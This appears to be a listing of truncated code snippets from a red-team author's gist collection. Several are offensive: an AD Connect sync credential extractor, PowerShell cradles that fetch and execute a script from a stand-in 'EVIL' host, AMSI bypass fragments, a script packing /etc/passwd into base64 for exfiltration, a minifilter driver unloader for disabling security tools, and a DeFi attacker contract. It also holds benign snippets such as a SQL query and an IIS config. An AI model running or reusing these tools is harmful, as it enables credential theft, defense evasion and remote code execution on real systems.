rvrsh3ll

Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

rvrsh3ll

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

rvrsh3ll

# Example of how to use Invoke-RestMethod with headers and cookies

$Credential = Get-Credential # Your credential goes here

[System.Uri]$Uri = "http://server01.example.com/api/pizza/1" # Add the Uri
$ContentType = "application/json" # Add the content type
$Method = 'PUT' # Add the method type
$Body = '{ "id" = 1, "Name" = "Peperoni" }' # Add the body for the request

$Cookie = New-Object System.Net.Cookie

rvrsh3ll

Hi SANS Workshop Attendees! Reflection is super fun!

amsi.dll
AmsiScanBuffer
uFcAB4DD

rvrsh3ll

with double_entry_book as (
  -- debits
  SELECT
  array_to_string(inputs.addresses, ",") as address
  , block_timestamp
  , -inputs.value as value
  FROM `bigquery-public-data.crypto_bitcoin.inputs` as inputs
  WHERE DATE(block_timestamp) >= '2011-1-1' and DATE(block_timestamp) <= '2014-1-1' 

  UNION ALL

rvrsh3ll

pragma solidity ^0.6.0;

import "./TrusterLenderPool.sol";

contract AttackerContract{
	uint256 public totalTokens = 1000000 ether;
	address public attackerAddress;
	// DamnValuableToken public dvTokenContract;
	address public dvTokenContract;
	TrusterLenderPool public poolContract;

rvrsh3ll

$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();

[System.Convert]::ToBase64String($ms.ToArray());

rvrsh3ll

<?xml version="1.0" encoding="UTF-8"?>
 <configuration>
     <system.webServer>
         <staticContent>
             <mimeMap fileExtension=".iso" mimeType="application/octet-stream" />
             <mimeMap fileExtension=".exe" mimeType="application/octet-stream" />
             <mimeMap fileExtension=".zip" mimeType="application/x-zip-compressed" />
         </staticContent>
     </system.webServer>
 </configuration>

rvrsh3ll

#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>

#pragma comment(lib,"FltLib.lib")

/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter. 

rvrsh3ll

POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>